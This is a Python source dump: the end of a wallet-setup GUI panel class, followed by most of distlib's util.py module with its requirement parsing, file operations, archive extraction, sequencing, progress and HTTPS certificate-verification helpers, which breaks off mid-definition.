return RecoverKeysPanel
else:
gpb.shared_panel_state['panel_index'] -= 1
return RecoverKeysShowPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
if gpb.shared_panel_state['panel_index'] == 0:
gpb.shared_panel_state['panel_index'] += 1
return RecoverKeysShowPanel
else:
return LoadWalletPanel
|
util.py
|
#
# Copyright (C) 2012-2016 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import shutil
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError:
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, urljoin, httplib, xmlrpclib,
splittype, HTTPHandler, BaseConfigurator, valid_ident,
Container, configparser, URLError, ZipFile, fsdecode)
logger = logging.getLogger(__name__)
#
# Requirement parsing code for name + optional constraints + optional extras
#
# e.g. 'foo >= 1.2, < 2.0 [bar, baz]'
#
# The regex can seem a bit hairy, so we build it up out of smaller pieces
# which are manageable.
#
COMMA = r'\s*,\s*'
COMMA_RE = re.compile(COMMA)
IDENT = r'(\w|[.-])+'
EXTRA_IDENT = r'(\*|:(\*|\w+):|' + IDENT + ')'
VERSPEC = IDENT + r'\*?'
RELOP = '([<>=!~]=)|[<>]'
#
# The first relop is optional - if absent, will be taken as '~='
#
BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + VERSPEC + ')(' + COMMA + '(' +
RELOP + r')\s*(' + VERSPEC + '))*')
DIRECT_REF = '(from\s+(?P<diref>.*))'
#
# Either the bare constraints or the bare constraints in parentheses
#
CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + '|' + DIRECT_REF +
r')\s*\)|(?P<c2>' + BARE_CONSTRAINTS + '\s*)')
EXTRA_LIST = EXTRA_IDENT + '(' + COMMA + EXTRA_IDENT + ')*'
EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]'
REQUIREMENT = ('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' +
CONSTRAINTS + ')?$')
REQUIREMENT_RE = re.compile(REQUIREMENT)
#
# Used to scan through the constraints
#
RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + VERSPEC + ')'
RELOP_IDENT_RE = re.compile(RELOP_IDENT)
def parse_requirement(s):
def get_constraint(m):
d = m.groupdict()
return d['op'], d['vn']
result = None
m = REQUIREMENT_RE.match(s)
if m:
d = m.groupdict()
name = d['dn']
cons = d['c1'] or d['c2']
if not d['diref']:
url = None
else:
# direct reference
cons = None
url = d['diref'].strip()
if not cons:
cons = None
constr = ''
rs = d['dn']
else:
if cons[0] not in '<>!=':
cons = '~=' + cons
iterator = RELOP_IDENT_RE.finditer(cons)
cons = [get_constraint(m) for m in iterator]
rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons]))
if not d['ex']:
extras = None
else:
extras = COMMA_RE.split(d['ex'])
result = Container(name=name, constraints=cons, extras=extras,
requirement=rs, source=s, url=url)
return result
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(base, path):
# normalizes and returns a lstripped-/-separated path
base = base.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(base)
return path[len(base):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
# The __PYVENV_LAUNCHER__ dance is apparently no longer needed, as
# changes to the stub launcher mean that sys.executable always points
# to the stub on OS X
# if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
# in os.environ):
# result = os.environ['__PYVENV_LAUNCHER__']
# else:
# result = sys.executable
# return result
result = os.path.normcase(sys.executable)
if not isinstance(result, text_type):
result = fsdecode(result)
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
jdata = json.load(stream)
result = jdata['extensions']['python.exports']['exports']
for group, entries in result.items():
for k, v in entries.items():
s = '%s = %s' % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
def read_stream(cp, stream):
if hasattr(cp, 'read_file'):
cp.read_file(stream)
else:
cp.readfp(stream)
cp = configparser.ConfigParser()
try:
read_stream(cp, stream)
except configparser.MissingSectionHeaderError:
stream.close()
data = textwrap.dedent(data)
stream = StringIO(data)
read_stream(cp, stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
#entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter('utf-8')(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = '%s is a symlink' % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = '%s is a non-regular file' % outfile
if msg:
raise ValueError(msg + ' which would be overwritten')
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data.encode(encoding))
self.record_as_written(path)
def set_mode(self, bits, mask, files):
if os.name == 'posix' or (os.name == 'java' and os._name == 'posix'):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
py_compile.compile(path, dpath, diagpath, True) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self):
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.+])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException('Invalid specification '
'%r' % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning('Directory exists but is not writable: %s', result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning('Unable to create %s', result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning('Default location unusable, using %s', result)
return os.path.join(result, suffix)
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.split('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([a-z0-9_.+-]+)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
r'\(\s*(?P<ver>[^\s)]+)\)$')
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
d = m.groupdict()
return d['name'].strip().lower(), d['ver']
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if '*' in requested:
requested.remove('*')
result |= available
for r in requested:
if r == '-':
result.add(r)
elif r.startswith('-'):
unwanted = r[1:]
if unwanted not in available:
logger.warning('undeclared extra: %s' % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning('undeclared extra: %s' % r)
result.add(r)
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
ct = headers.get('Content-Type')
if not ct.startswith('application/json'):
logger.debug('Unexpected response for JSON request: %s', ct)
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
_external_data_base_url = 'https://www.red-dove.com/pypi/projects/'
def get_project_data(name):
url = '%s/%s/project.json' % (name[0].upper(), name)
url = urljoin(_external_data_base_url, url)
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = '%s/%s/package-%s.json' % (name[0].upper(), name, version)
url = urljoin(_external_data_base_url, url)
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base):
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning('Directory \'%s\' is not private', base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError:
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError:
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else:
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G','T','P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
if ssl:
from .compat import (HTTPSHandler as BaseHTTPSHandler, match_hostname,
CertificateError)
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug('Host verified: %s', self.host)
except CertificateError:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
